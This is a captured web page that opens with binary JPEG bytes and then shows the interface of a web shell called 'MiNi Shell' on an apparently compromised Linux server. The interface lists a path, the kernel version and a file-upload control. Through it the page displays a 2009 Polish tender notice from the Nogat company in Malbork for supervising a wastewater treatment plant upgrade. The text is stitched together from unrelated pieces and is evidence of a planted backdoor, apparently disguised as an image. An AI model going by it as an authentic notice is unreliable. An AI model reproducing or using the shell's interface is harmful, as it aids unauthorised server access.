JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090812/275300-N-2009.html

<p class="kh_header"><b>Malbork: Pełnienie obowiązków Inwestora Zastępczego na rzecz Zamawiającego przy realizacji II etapu inwestycji: Zaprojektowanie i budowa przedsięwzięcia pn. Modernizacja i rozbudowa oczyszczalni ścieków w Kałowie Wsi w części dotyczącej piaskowników i osadników wstępnych</b><br>
<b>Numer ogłoszenia: 275300 - 2009; data zamieszczenia: 12.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo "Nogat" Sp. z o.o. Kałdowo Wieś , 82-200 Malbork, woj. pomorskie, tel. 055 2722166, faks 05502722166.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nogat.malbork.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie obowiązków Inwestora Zastępczego na rzecz Zamawiającego przy realizacji II etapu inwestycji: Zaprojektowanie i budowa przedsięwzięcia pn. Modernizacja i rozbudowa oczyszczalni ścieków w Kałowie Wsi w części dotyczącej piaskowników i osadników wstępnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy zakres zamówienia obejmuje:

I. Faza WSTĘPNA:
a)	Weryfikacja kompletności i dostosowanie istniejącego Programu Funkcjonalno-Użytkowego (PFU) do wymogów postępowania o udzielenie zamówienia publicznego w zakresie II ETAPU inwestycji, w związku z Ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2006 r. Nr 156 poz. 1118 z późniejszymi zmianami) oraz Rozporządzeniami Ministra Infrastruktury z dnia 03-07-2003 w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. 2003 Nr 120 poz. 1133 z późn. zm.) oraz z dn. 02-09-2004 w sprawie szczegółowego zakresu i formy dokumentacji projektowej, STWiORB oraz PFU (Dz. U. 2004 Nr 202 poz. 2072 z późn. zm.). 
b)	Uzupełnienie PFU m. in. o opis wymagań Zamawiającego w sprawie szczegółowych właściwości funkcjonalno-użytkowych wszystkich urządzeń technologicznych (w oparciu o posiadane oferty). 
c)	Wycena kosztów prac projektowych oraz robót budowlano - montażowych II ETAPU inwestycji, sporządzona zgodnie z Rozporządzeniem Ministra Infrastruktury z dn. 18-05-04 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz.U. 2004, Nr 130, poz.138)
d)	Sporządzenie Specyfikacji Istotnych Warunków Zamówienia (SIWZ) do przetargu o zamówienie publiczne na wyłonienie WYKONAWCY  II ETAPU inwestycji, zgodnie z Ustawą z dn. 29-04-2001 Prawo zamówień publicznych ( tekst jednolity: Dz. U. 2007, Nr 223, poz. 1655 z późn. zm.)  
i przedłożenie Zamawiającemu do akceptacji
e)	Udział u boku Zamawiającego w charakterze biegłego w procedurze przetargowej na wybór WYKONAWCY 

II. Faza REALIZACJI - ZAPROJEKTUJ
a)	Weryfikacja graficznej wersji roboczej Projektu budowlanego zaprojektowanych obiektów i urządzeń na mapach do celów projektowych, umożliwiających jednoznaczne określenie rodzaju i zakresu robót budowlanych podstawowych pod kątem zgodności z PFU i przedłożenie do akceptacji Zamawiającemu
b)	Weryfikacja ostatecznej wersji Projektu budowlanego pod kątem zgodności z PFU i przedłożenie do akceptacji Zamawiającemu 
c)	Weryfikacja wniosku WYKONAWCY, występującego w imieniu Zamawiającego, o Decyzję - pozwolenia na budowę
d)	Weryfikacja Projektów Wykonawczych i przedłożenie ich do akceptacji Zamawiającemu 



III. Faza REALIZACJI - WYBUDUJ
a)	Udział przy przekazaniu przez Zamawiającego placu budowy dla WYKONAWCY 
b)	Koordynacja  pracy   nadzoru   autorskiego   polegająca na bieżącym zgłaszaniu autorowi projektu budowlanego wad dokumentacji i bieżące egzekwowanie od autora projektu usunięcia wad dokumentacji przy czynnym współudziale Zamawiającego i WYKONAWCY 
c)	Podporządkowanie procesu budowlanego obowiązującym przepisom BHP, a w szczególności reżimom BHP na czynnym obiekcie Zamawiającego
d)	Organizowanie w okresie realizacji zadania narad organizacyjno-technicznych stron procesu budowlanego (tj. Zamawiającego, WYKONAWCY i jeżeli zajdzie taka konieczność - nadzoru autorskiego)
e)	Bieżące dokumentowanie procesu budowlanego umożliwiające Zamawiającemu kontrolę nad jego przebiegiem i archiwizacja wszystkich dokumentów procesu budowlanego 
f)	Udostępnianie Zamawiającemu wszelkich dokumentów związanych z realizacją  procesu  budowlanego   
g)	Kompletowanie i merytoryczne opiniowanie dokumentów warunkujących bieżące płatności WYKONAWCY  - bieżące rozliczanie inwestycji;
h)	Przedłożenie Zamawiającemu do akceptacji wykonania robót zamiennych i/lub dodatkowych ilub koniecznych po uprzedniej weryfikacji pod kątem merytoryczno-finansowym 
i)	Informowanie na piśmie Zamawiającego o wszelkich faktach mających znaczenie dla realizacji inwestycji, w tym w szczególności o ewentualnych okolicznościach mogących skutkować nieterminową realizacją zadania i/lub odstąpieniem WYKONAWCY od jego realizacji
j)	Bieżąca weryfikacja Harmonogramu Realizacji Przedmiotu Zamówienia umożliwiająca dostosowanie tempa i zakresu realizacji do przyjętego finansowania
k)	W razie uzasadnionych okoliczności przeprowadzenie procedury dodatkowych badań wbudowanych materiałów, urządzeń i jakości wykonanych robót przez WYKONAWCĘ 
l)	Sprawowanie nadzoru inwestorskiego (zgodnie z art. 25 i 26 Ustawy Prawo budowlane) we wszystkich branżach technicznych niezbędnych dla prawidłowej realizacji procesu budowlanego, tj. m. in.: 
-	Sprawowanie kontroli nad realizacją procesu budowlanego zgodnie z dokumentacją projektową i pozwoleniem na budowę, przepisami i obowiązującymi normami oraz zasadami wiedzy technicznej
-	Sprawdzanie jakości wykonywanych robót budowlanych, a w szczególności udział w dokonywaniu odbiorów robót zanikających ilub ulegających zakryciu ilub robót konstrukcyjnych i montażowych,
-	Sprawdzanie jakości wbudowywanych materiałów, urządzeń i wyrobów - a w szczególności zapobieganie przed stosowaniem przez WYKONAWCĘ materiałów, urządzeń i wyrobów wadliwych i niedopuszczonych do obrotu i stosowania w budownictwie;
-	Koordynacja i udział u boku Zamawiającego w procedurze odbiorów częściowych, robót zanikających, ulegających zakryciu i końcowego 
m)	Udział w rozruchu techniczno-technologicznym II ETAPU inwestycji
n)	Przeprowadzenie odbioru końcowego II ETAPU inwestycji 
o)	Końcowe rozliczenie przedsięwzięcia inwestycyjnego umożliwiającego określenie wartości zgodnie z RRM z dn. 30-12-1999 r. - Klasyfikacja Środków Trwałych   
p)	Weryfikacja dostarczonej dokumentacji powykonawczej i inwentaryzacji geodezyjnej 
q)	Weryfikacja wniosku WYKONAWCY, występującego w imieniu Zamawiającego, o Decyzję - pozwolenia na użytkowanie obiektu.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.24.80.00-8, 71.24.70.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 15.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium - 3 000 zł. ( trzy tysiące złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Wykonawcy ubiegający się o zamówienie publiczne muszą spełniać niżej wymienione warunki udziału w postępowaniu: 

1.1.	posiadać uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień oraz nie podlegać wykluczeniu z postępowania o udzielenie zamówienia. ( w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej wykonawców w ofercie muszą być złożone dokumenty dla każdego z nich) : 

1.2.	posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich wspólny potencjał techniczny oraz łączne kwalifikacje i doświadczenie) , tj.:

1.2.1.	wykonać w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, co najmniej jedną usługę o wartości robót budowlanych min. 5 000 000 PLN, odpowiadającą swoim rodzajem usługom, stanowiącym przedmiot zamówienia, tj. pełnienia nadzoru inwestorskiego dla co najmniej jednej inwestycji w branży wod.-kan.

1.2.2.	wykonać w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej jedną usługę o wartości robót budowlanych min. 5 000 000 PLN, odpowiadającą swoim rodzajem usługom, stanowiącym przedmiot zamówienia, tj. opracowania lub weryfikacji dokumentacji projektowej dla co najmniej jednej inwestycji w branży wod.-kan. 

1.2.3.	podać wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia,  niezbędnych do wykonania zamówienia, a także zakresu wykonywania przez nich czynności:

1.2.3.1.	Główny przedstawiciel Inwestora Zastępczego, który musi:posiadać wykształcenie wyższe, posiadać co najmniej 5 lat doświadczenia w nadzorowaniu co najmniej jedną inwestycją o wartości robót min. 5 000 000 PLN w branży wod-kan., posiadać uprawnienia budowlane, należeć do właściwej izby samorządu zawodowego 

1.2.3.2.	Zespół osób do weryfikacji dokumentacji projektowej i jej zgodności z Programem Funkcjonalno-Użytkowym, który musi obejmować co najmniej:projektanta o specjalności konstrukcyjno-budowlanej, projektanta o specjalności sanitarnej, projektanta o specjalności elektrycznej 

1.2.3.3.	Zespół osób do realizacji zadań związanych z przygotowaniem i realizacją zadania, który musi obejmować co najmniej: 
Inspektora nadzoru inwestorskiego (branży budowlano-konstrukcyjnej), który musi:
-	posiadać min. 5 lat doświadczenia zawodowego 
-	posiadać uprawnienia budowlane 
-	należeć do właściwej izby samorządu zawodowego 

Inspektora nadzoru inwestorskiego (branży sanitarnej), który musi:
-	posiadać min. 5 lat doświadczenia zawodowego, w tym 3 lata jako inspektor nadzoru inwestorskiego  
-	posiadać uprawnienia budowlane w specjalności w zakresie sieci, instalacji 
i urządzeń kanalizacyjnych  
-	należeć do właściwej izby samorządu zawodowego 

Inspektora nadzoru inwestorskiego (branży elektrycznej, automatyki itp.), który musi:
-	posiadać min. 5 lat doświadczenia zawodowego, w tym 3 lata jako inspektor nadzoru inwestorskiego  
-	posiadać uprawnienia budowlane w specjalności w zakresie sieci, instalacji 
i urządzeń elektrycznych, automatyki 
-	należeć do właściwej izby samorządu zawodowego 

Zamawiający dopuszcza łączenie funkcji przez wskazane osoby, które będą wykonywać niniejsze zamówienie pod warunkiem , że osoba ta spełnia wymagania dla każdej z łączonych funkcji. 

1.3.	znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa. W tym celu dokumenty ma obowiązek złożyć ten z Wykonawców, który w imieniu wszystkich wykazywać będzie spełnienie tego warunku), tj.: 

1.3.1.	wykonawca osiągnął przychód roczny netto ze sprzedaży w ostatnich trzech latach obrotowych w wysokości co najmniej 500 000 PLN.

2.	Niespełnienie choćby jednego z wyżej wymienionych warunków udziału w postępowaniu będzie skutkowało wykluczeniem Wykonawcy z postępowania. Ofertę Wykonawcy wykluczonego z postępowania uznaje się za odrzuconą.  

3.	Zamawiający dokona oceny spełnienia ww. warunków udziału w postępowaniu według formuły spełnia - nie spełnia na podstawie analizy dokumentów i informacji przedłożonych w ofercie przez Wykonawcę..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na oświadczenia i dokumenty składające się na potwierdzenie spełnienia warunków udziału w postępowaniu składają się: 

1.	W celu potwierdzenia spełniania warunku, określonego w  pkt 1.1., Wykonawcy zobowiązani są przedłożyć:

a)	oświadczenie o zdolności do udziału w postępowaniu, sporządzone według wzoru stanowiącego załącznik nr 2 do niniejszej SIWZ  
b)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6  miesięcy przed upływem terminu składania ofert; 
c)	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;

2.	W celu potwierdzenia spełniania warunku, określonego w pkt 1.2., Wykonawcy zobowiązani są przedłożyć:

a)	wykaz wykonanych usług sporządzony według wzoru stanowiącego załącznik nr 3 do  niniejszej SIWZ. 
b)	referencje potwierdzające, że ww usługi zostały wykonane należycie. Referencje powyższe mogą być wystawione na Wykonawcę lub na Podwykonawców wskazanych w ofercie.
c)	informację o zamiarze powierzenia wykonania części zamówienia przez osoby trzecie, sporządzoną według wzoru stanowiącego załącznik nr 4 do niniejszej SIWZ 
d)	wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, sporządzony według wzoru stanowiącego załącznik nr 5 do niniejszej SIWZ.  
e)	pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w ppkt. d, wykonawca wskazał osoby, którymi będzie dysponował, 
f)	kopie uprawnień projektowych w wymaganej specjalności, 
g)	kopie uprawnień budowlanych w wymaganej specjalności 
h)	kopie dokumentów potwierdzające przynależność do właściwych izb samorządu zawodowego.

3.	W celu potwierdzenia spełniania warunku, określonego w pkt 1.3., Wykonawcy zobowiązani są przedłożyć:

a)	sprawozdanie finansowe albo jego część, a w przypadku wykonawców niezobowiązanych do sporządzenia sprawozdania finansowego innych dokumentów określających obroty oraz zobowiązania i należności za okres ostatnich 3 lat obrotowych, a jeżeli okres działalności jest krótszy - za ten okres.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.nogat.malbork.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedsiębiorstwo NOGAT Sp.z o.o.
Kałdowo Wieś, 82-200 Malbork
sekretariat spółki.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.09.2009 godzina 09:00, miejsce: Przedsiębiorstwo NOGAT Sp.z o.o.
Kałdowo Wieś, 82-200 Malbork
sekretariat spółki.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com